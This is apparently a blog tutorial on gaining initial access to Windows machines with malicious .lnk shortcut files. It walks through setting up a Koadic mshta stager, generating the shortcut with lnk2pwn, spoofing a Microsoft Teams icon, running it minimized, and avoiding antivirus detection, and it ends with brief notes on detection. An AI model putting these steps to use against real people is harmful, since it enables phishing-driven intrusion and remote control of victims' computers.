Pwning with shortcut : Abusing windows lnk feature to get foothold
In windows lnk is an extension of shortcut files. Windows create a shortcut which points to an actual file and run that application. In this post we will see how threat actor can abuse windows lnk feature and do some social engineering trick to make someone run a malicious application
What this post is about
This post is a series of social engineering attack where an attacker can use some malicious shortcut file with a spoof extension using Unicode character and a fake image. Shortcut file can be used with living off the land techniques which can help to bypass defender.
What this post is not about
This post will only show initial access part where an attacker gain access to the victim machine using very basic techniques. The next post will show evading most antivirus and detection .
Preparing the Attack
For this attack I am going to use Koadic, a COM based command and control framework. Koadic can deliver the payload directly in memory from Stage0 using some living off the land technique which can help us to bypass basic detection.
I am going to select mshta attack technique for stager by typing use stager/js/mshta
Next I am setting the ENDPOINT to trusted which will be the payload name
Now running the payload
Our attacker machine is ready to send the payload now
Preparing malicious shortcut file
You can create a malicious shortcut file manually but to make thing a little automated I am going to use lnk2pwn
After running ln2pwn this is what we get on screen
Download the .ico file which you want for spoofing the icon as I am using Microsoft teams app icon for this. Or you can install the program and load the icon from it’s installed location
Now in lnk2pwn use the following setting:
1. Put your malicious command here, try to use LOLBIN method
2. Set the location of your ico file. Make sure you are spoofing icon from installed software (for example choose the icon from program files, system32 directory)otherwise the icon will not load on the victim system. I am using downloaded icon just for the demo.
3. Select the minimize option as this will run the cmd prompt minimized.
4. Select your fake extension , I am leaving it blank because I want to make it a lnk file.
5. Select generate button and set your location to save the malicious shortcut file
Our shortcut file is ready to deliver
I tested this shortcut file on our victim machine with an updated version of Quick Heal and it was not able to detect the file.
At last I executed the file and it run the mshta command inside the minimized cmd prompt
And I got the shell on my kali machine
Analyzing malicious lnk file
You can use exiftool to detect malicious lnk file but LeCmd by EricZimmerman does a better job to parse it as shown below.
Final words
This was very basic method to abuse lnk feature in my next post we will see how this method can help an attacker to bypass some popular AVs